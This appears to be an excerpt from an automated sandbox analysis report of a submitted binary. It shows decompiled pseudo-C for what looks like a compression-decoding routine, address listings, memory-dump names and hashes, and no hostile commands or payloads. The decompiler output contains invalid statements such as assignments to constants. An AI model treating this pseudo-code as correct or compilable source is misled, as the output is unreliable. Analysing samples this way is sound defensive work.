													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407395
0x00407395
0x00407399
0x004073be
0x004073c8
0x00000000
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a8
0x004073ac
0x004073ac
0x004073af
0x00407489
0x00407489
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00000000
0x00407482
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x00000000
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00407524
0x00000000
0x00407399

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
